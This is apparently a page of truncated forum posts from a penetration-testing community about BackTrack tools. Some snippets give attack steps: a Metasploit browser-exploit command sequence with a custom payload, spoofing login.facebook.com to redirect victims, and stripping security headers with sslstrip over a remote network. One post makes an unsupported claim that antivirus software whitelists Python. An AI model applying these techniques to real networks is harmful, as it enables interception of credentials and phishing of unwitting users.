I did some further reading. The header can only be set in a secure connection, which means that you could not use sslstrip or ettercap to intercept and remove the headers. Which makes sense.
...

Thanks for the information.

sslstrip can already change or remove headers. Look into the python code and you will see that you can strip the headers before they get to the victim.

I could not...

That is what I thought, thanks for confirming it.

Thank you for you help

I try the following:
use exploit/windows/browser/msxml_get_definition_code_exec
set EXE::Custom /root/test.exe
set URIPATH test
exploit -j

When I access the generated...

Thank you for your work on this script. Works great as a standalone executable. This may sound ignorant, do you know any way to use the exe as a payload in metasploit?

I would only spoof part of the domain for example:
192.168.0.111 (your ip) login.facebook.com

since login.facebook.com does not exist, there is no problem when the victim is redirected to the...

From what I understand, virus software has basically white listed anything that is python. I think that because just like java, they can't tell one python from the other to determine if it is...

Scapy is python,

so you should run it as a python script for example:

#! /usr/bin/env python
from scapy.all import *

def arp_monitor_callback(pkt):
if ARP in pkt and pkt[ARP].op in...

Both Charles Proxy and Burp have a headless mode (run without interface)

If you come up with any good scripts to control any of these transparent proxies, would appreciate if you could share.

Charles Proxy is an excellent tool for this kind of thing, much better than burp. Using bash to read data from the web interface you can automate everything.
You may also want to try Sergio Proxy...

Oh in case you were referring to the built in wireless card not USB, I have no problems with that either.

Hmm, I am not sure If I am answering your question properly but here is a more detailed answer:

I am using a Mac Air running osx LION with latest version of VMware Fusion. I have 4-5 wireless...

No problems on osx Lion both BT5 and Ubuntu

Download the source code and then run make install
Xplico has a step by step wiki on their web site. The .deb does not seem to work even on other versions of ubuntu

excellent program, I don't...

WICD is the most frustrating piece of software on backtrack and one of the reasons people want to try and use a different distribution. hopefully with the new version of backtrack coming out based...

Remotely as SSH into a remote network and then use proxychains to sslstrip the remote network.

Very interesting use of Proxychains and SSLSTRIP, have you been sucessfull without the SQUID Proxy?

Also wouldn't the IP tables need to be run on the remote server?

Be interesting if you can...

No problem to have a hidden truecrypt partition, usually this is a partition inside another truecrypt partition.

Unlike windows you can't boot from a Linux truecrypt partition.

Almost all scanners (nmap, ettercap) provide mac address information. Have you never used a scanner before?

I think it is legitimate to ask these questions.

The real question is how will we ever know the answer?

And should pentesters be worried that they may be injecting backdoors on their customers...

run the following in terminal:
ln -s /lib/ld-linux.so.2 /lib/ld-lsb.so.3

It is installed, the menus have changed a bit.

I get the same error on two different computers that previously have R1 installed:

Errors were encountered while processing:
...

I have noticed that autopwn works fine using fastrack but does not work correctly when typing the same commands from the console (using sqlite3)
anybody have any idea why?

I will try to do a proper tutorial when I have more time. in the meantime
Here is what I do:

#go the the tmp dir
cd /tmp

#Download the file
wget...